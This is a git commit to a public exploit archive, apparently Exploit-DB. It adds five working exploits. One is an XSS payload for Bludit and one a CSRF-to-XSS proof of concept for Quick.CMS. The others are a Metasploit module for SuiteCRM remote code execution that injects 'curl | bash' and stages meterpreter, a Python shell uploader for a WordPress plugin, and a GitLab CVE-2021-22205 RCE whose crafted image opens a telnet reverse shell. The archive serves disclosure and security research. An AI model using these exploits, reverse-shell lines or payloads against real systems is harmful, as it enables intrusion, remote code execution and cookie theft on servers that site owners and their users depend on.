2021-11-18 05:02:10 +00:00 · 2021-11-18 05:02:10 +00:00 · a4598bc3c4
commit a4598bc3c4
parent 11900b8459
6 changed files with 515 additions and 0 deletions
--- a/exploits/php/webapps/50529.txt
+++ b/exploits/php/webapps/50529.txt
@ -0,0 +1,14 @@
+# Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
+# Date: 19/10/2021
+# Exploit Author: Vasu (tamilan_mkv)
+# Vendor Homepage: https://www.bludit.com
+# Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip
+# Version: bludit-3-13-1
+# Tested on: kali linux
+# CVE : CVE-2021-35323
+
+### Steps to reproduce
+
+1. Open login page http://localhost:800/admin/login;
+2. Enter the username place ``admin"><img src=x onerror=alert(1)>``and enter the password
+3. Trigger the malicious javascript code
--- a/exploits/php/webapps/50530.txt
+++ b/exploits/php/webapps/50530.txt
@ -0,0 +1,31 @@
+# Exploit Title: Quick.CMS 6.7 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
+# Date: 21/04/2021
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: https://opensolution.org/
+# Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
+# Version: 6.7
+# Tested on: Windows 8.1, Kali Linux, Burp Suite
+
+Steps to Reproduce:
+
+1. At first login to your panel
+2. then click the "Sliders" menu to "New Slider"
+3. now intercept with the burp suite and save a new slider
+4. Then use XSS payload </textarea><script>alert(document.domain)</script> in sDescription value.
+5. Now Generate a CSRF POC
+
+<!DOCTYPE html>
+<html>
+<body>
+  <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST">
+    <input type="hidden" name="iSlider" value="">
+    <input type="hidden" name="aFile" filename="">
+    <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg">
+    <input type="hidden" name="sDescription"
+value="test</textarea><script>alert(document.cookie)</script>">
+    <input type="hidden" name="iPosition" value="1">
+    <input type="hidden" name="sOption" value="save">
+    <input type="submit" value="submit">
+  </form>
+</body>
+</html>
--- a/exploits/php/webapps/50531.rb
+++ b/exploits/php/webapps/50531.rb
@ -0,0 +1,343 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SuiteCRM Log File Remote Code Execution',
+        'Description' => %q{
+          This module exploits an input validation error on the log file extension parameter. It does
+          not properly validate upper/lower case characters. Once this occurs, the application log file
+          will be treated as a php file. The log file can then be populated with php code by changing the
+          username of a valid user, as this info is logged. The php code in the file can then be executed
+          by sending an HTTP request to the log file. A similar issue was reported by the same researcher
+          where a blank file extension could be supplied and the extension could be provided in the file
+          name. This exploit will work on those versions as well, and those references are included.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'M. Cory Billington' # @_th3y
+        ],
+        'References' => [
+          ['CVE', '2021-42840'],
+          ['CVE', '2020-28328'], # First CVE
+          ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
+          ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
+          ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
+        ],
+        'Platform' => %w[linux unix],
+        'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
+        'Targets' => [
+          [
+            'Linux (x64)', {
+              'Arch' => ARCH_X64,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux (cmd)', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true,
+        'DisclosureDate' => '2021-04-28',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),
+        OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),
+        OptString.new('PASS', [true, 'Password for administrator', 'admin']),
+        OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),
+        OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
+        OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
+      ]
+    )
+  end
+
+  def check
+    authenticate unless @authenticated
+    return Exploit::CheckCode::Unknown unless @authenticated
+
+    version_check_request = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Home',
+          'action' => 'About'
+        }
+      }
+    )
+
+    return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request
+
+    version_match = version_check_request.body[/
+      Version
+      \s
+      \d{1} # Major revision
+      \.
+      \d{1,2} # Minor revision
+      \.
+      \d{1,2} # Bug fix release
+      /x]
+
+    version = version_match.partition(' ').last
+
+    if version.nil? || version.empty?
+      about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
+      return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
+    end
+
+    patched_version = Rex::Version.new('7.11.18')
+    current_version = Rex::Version.new(version)
+
+    return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version
+
+    Exploit::CheckCode::Safe("SuiteCRM #{version}")
+  end
+
+  def authenticate
+    print_status("Authenticating as #{datastore['USER']}")
+    initial_req = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Users',
+          'action' => 'Login'
+        }
+      }
+    )
+
+    return false unless initial_req && initial_req.code == 200
+
+    login = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_post' => {
+          'module' => 'Users',
+          'action' => 'Authenticate',
+          'return_module' => 'Users',
+          'return_action' => 'Login',
+          'user_name' => datastore['USER'],
+          'username_password' => datastore['PASS'],
+          'Login' => 'Log In'
+        }
+      }
+    )
+
+    return false unless login && login.code == 302
+
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Administration',
+          'action' => 'index'
+        }
+      }
+    )
+
+    auth_succeeded?(res)
+  end
+
+  def auth_succeeded?(res)
+    return false unless res
+
+    if res.code == 200
+      print_good("Authenticated as: #{datastore['USER']}")
+      if res.body.include?('Unauthorized access to administration.')
+        print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")
+        @is_admin = false
+      else
+        print_good("#{datastore['USER']} has administrative rights.")
+        @is_admin = true
+      end
+      @authenticated = true
+      return true
+    else
+      print_error("Failed to authenticate as: #{datastore['USER']}")
+      return false
+    end
+  end
+
+  def post_log_file(data)
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'ctype' => "multipart/form-data; boundary=#{data.bound}",
+        'keep_cookies' => true,
+        'headers' => {
+          'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
+        },
+        'data' => data.to_s
+      }
+    )
+  end
+
+  def modify_system_settings_file
+    filename = rand_text_alphanumeric(8).to_s
+    extension = '.pHp'
+    @php_fname = filename + extension
+    action = 'Modify system settings file'
+    print_status("Trying - #{action}")
+
+    data = Rex::MIME::Message.new
+    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
+    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
+    data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')
+    data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')
+    data.add_part('info', nil, nil, 'form-data; name="logger_level"')
+    data.add_part('Save', nil, nil, 'form-data; name="save"')
+
+    res = post_log_file(data)
+    check_logfile_request(res, action)
+  end
+
+  def poison_log_file
+    action = 'Poison log file'
+    if target.arch.first == 'cmd'
+      command_injection = "<?php `curl #{@download_url} | bash`; ?>"
+    else
+      @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"
+      command_injection = %(
+        <?php `curl #{@download_url} -o #{@meterpreter_fname};
+        /bin/chmod 700 #{@meterpreter_fname};
+        /bin/sh -c #{@meterpreter_fname};`; ?>
+      )
+    end
+
+    print_status("Trying - #{action}")
+
+    data = Rex::MIME::Message.new
+    data.add_part('Users', nil, nil, 'form-data; name="module"')
+    data.add_part('1', nil, nil, 'form-data; name="record"')
+    data.add_part('Save', nil, nil, 'form-data; name="action"')
+    data.add_part('EditView', nil, nil, 'form-data; name="page"')
+    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
+    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
+    data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')
+
+    res = post_log_file(data)
+    check_logfile_request(res, action)
+  end
+
+  def restore
+    action = 'Restore logging to default configuration'
+    print_status("Trying - #{action}")
+
+    data = Rex::MIME::Message.new
+    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
+    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
+    data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
+    data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
+    data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
+    data.add_part('Save', nil, nil, 'form-data; name="save"')
+
+    post_log_file(data)
+
+    data = Rex::MIME::Message.new
+    data.add_part('Users', nil, nil, 'form-data; name="module"')
+    data.add_part('1', nil, nil, 'form-data; name="record"')
+    data.add_part('Save', nil, nil, 'form-data; name="action"')
+    data.add_part('EditView', nil, nil, 'form-data; name="page"')
+    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
+    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
+    data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')
+
+    res = post_log_file(data)
+
+    print_error("Failed - #{action}") unless res && res.code == 301
+
+    print_good("Succeeded - #{action}")
+  end
+
+  def check_logfile_request(res, action)
+    fail_with(Failure::Unknown, "#{action} - no reply") unless res
+
+    unless res.code == 301
+      print_error("Failed - #{action}")
+      fail_with(Failure::UnexpectedReply, "Failed - #{action}")
+    end
+
+    print_good("Succeeded - #{action}")
+  end
+
+  def execute_php
+    print_status("Executing php code in log file: #{@php_fname}")
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri, @php_fname),
+        'keep_cookies' => true
+      }
+    )
+    fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404
+    register_files_for_cleanup(@php_fname)
+    register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?
+  end
+
+  def on_request_uri(cli, _request)
+    send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
+    print_good("#{peer} - Payload sent!")
+  end
+
+  def start_http_server
+    start_service(
+      {
+        'Uri' => {
+          'Proc' => proc do |cli, req|
+            on_request_uri(cli, req)
+          end,
+          'Path' => resource_uri
+        }
+      }
+    )
+    @download_url = get_uri
+  end
+
+  def exploit
+    start_http_server
+    authenticate unless @authenticated
+    fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated
+    fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
+    modify_system_settings_file
+    poison_log_file
+    execute_php
+  ensure
+    restore if datastore['RESTORECONF']
+  end
+end
--- a/exploits/php/webapps/50533.py
+++ b/exploits/php/webapps/50533.py
@ -0,0 +1,84 @@
+# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
+# Google Dork: inurl: /wp-content/plugins/smart-product-review/
+# Date: 16/11/2021
+# Exploit Author: Keyvan Hardani
+# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
+# Version: <= 1.0.4
+# Tested on: Kali Linux
+
+import os.path
+from os import path
+import json
+import requests;
+import time
+import sys
+
+def banner():
+    animation = "|/-\\"
+    for i in range(20):
+        time.sleep(0.1)
+        sys.stdout.write("\r" + animation[i % len(animation)])
+        sys.stdout.flush()
+        #do something
+    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
+    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")
+
+def usage():
+	print("Usage: python3 exploit.py [target url] [your shell]")
+	print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
+
+def vuln_check(uri):
+	response = requests.get(uri)
+	raw = response.text
+
+	if ("No script kiddies please!!" in raw):
+		return False;
+	else:
+		return True;
+
+def main():
+
+	banner()
+	if(len(sys.argv) != 3):
+		usage();
+		sys.exit(1);
+
+	base = sys.argv[1]
+	file_path = sys.argv[2]
+
+	ajax_action = 'sprw_file_upload_action'
+	admin = '/wp-admin/admin-ajax.php';
+
+	uri = base + admin + '?action=' + ajax_action ;
+	check = vuln_check(uri);
+
+	if(check == False):
+		print("(*) Target not vulnerable!");
+		sys.exit(1)
+
+	if( path.isfile(file_path) == False):
+		print("(*) Invalid file!")
+		sys.exit(1)
+
+	files = {'files[]' : open(file_path)}
+	data = {
+	"allowedExtensions[0]" : "jpg",
+    "allowedExtensions[1]" : "php4",
+    "allowedExtensions[2]" : "phtml",
+    "allowedExtensions[3]" : "png",
+	"qqfile" : "files",
+    "element_id" : "6837",
+    "sizeLimit" : "12000000",
+    "file_uploader_nonce" : "2b102311b7"
+	}
+	print("Uploading Shell...");
+	response = requests.post(uri, files=files, data=data )
+	file_name = path.basename(file_path)
+	if("ok" in response.text):
+		print("Shell Uploaded!")
+		print("Shell URL on your Review/Comment");
+	else:
+		print("Shell Upload Failed")
+		sys.exit(1)
+
+main();
--- a/exploits/ruby/webapps/50532.txt
+++ b/exploits/ruby/webapps/50532.txt
@ -0,0 +1,38 @@
+# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
+# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22
+# Date: 11/01/2021
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://about.gitlab.com/
+# Software Link: https://gitlab.com/gitlab-org/gitlab
+# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
+# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
+# CVE : CVE-2021-22205
+# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/
+# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed
+
+Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.
+
+1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.
+
+echo -e
+"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="
+| base64 -d > lol.jpg
+echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
+echo -n
+"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="
+| base64 -d >> lol.jpg
+
+2. Sending the payload. Any random endpoint will do.
+
+curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)
+
+2a. Sample Output from the reverse shell:
+
+$ nc -lnvp 1270
+Listening on [0.0.0.0] (family 0, port 1270)
+Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport
+34836)
+whoami
+git
+id
+uid=998(git) gid=998(git) groups=998(git)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44624,3 +44624,8 @@ id,file,description,date,author,type,platform,port
 50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,
 50526,exploits/php/webapps/50526.py,"Online Learning System 2.0 - Remote Code Execution (RCE)",1970-01-01,djebbaranon,webapps,php,
 50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,multiple,
+50529,exploits/php/webapps/50529.txt,"Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)",1970-01-01,Vasu,webapps,php,
+50530,exploits/php/webapps/50530.txt,"Quick.CMS 6.7 - Cross Site Request Forgery (CSRF) to Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
+50531,exploits/php/webapps/50531.rb,"SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"M. Cory Billington",webapps,php,
+50532,exploits/ruby/webapps/50532.txt,"GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jacob Baines",webapps,ruby,
+50533,exploits/php/webapps/50533.py,"Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload",1970-01-01,"Keyvan Hardani",webapps,php,